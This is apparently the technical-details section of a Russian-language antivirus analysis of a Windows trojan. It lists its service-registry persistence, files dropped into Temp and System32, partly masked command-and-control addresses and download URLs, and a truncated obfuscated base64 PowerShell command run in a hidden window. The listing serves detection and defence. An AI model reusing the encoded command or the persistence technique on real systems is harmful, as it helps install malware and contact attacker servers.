Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\where] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\where] 'ImagePath' = '"<SYSTEM32>\SndVolSSO\where.exe"'
- 'where' "<SYSTEM32>\SndVolSSO\where.exe"
- 'where' <SYSTEM32>\SndVolSSO\where.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAG8AYgBhAHUANABwAD0AKAAnAEsAbgAnACsAKAAnADUAZAAnACsAJwA2AGQAYQAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVABlAG0AcABcAHcATwBSAGQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\u4cjf5lx.exe
- <SYSTEM32>\sndvolsso\where.exe
- %TEMP%\word\2019\u4cjf5lx.exe в <SYSTEM32>\sndvolsso\where.exe
- '82.##9.200.118':80
- '18#.#1.158.15':8080
- http://ka###-sd.com/admin/nlYFI/
- http://ki###1tours.com/pdf/lwuqKsRgijhXw/
- http://18#.##.158.15:8080/58HCrthkYa/651bu9uSON/UIKK7KeE/SREa4DHqur/oc4fnRx7/ via 18#.#1.158.15
- DNS ASK ka###-sd.com
- DNS ASK ki###1tours.com
- '%TEMP%\word\2019\u4cjf5lx.exe'
- '<SYSTEM32>\sndvolsso\where.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAG8AYgBhAHUANABwAD0AKAAnAEsAbgAnACsAKAAnADUAZAAnACsAJwA2AGQAYQAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVABlAG0AcABcAHcATwBSAGQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)